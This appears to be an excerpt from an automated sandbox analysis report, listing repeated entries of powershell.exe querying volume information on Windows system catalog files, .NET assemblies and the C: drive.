          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
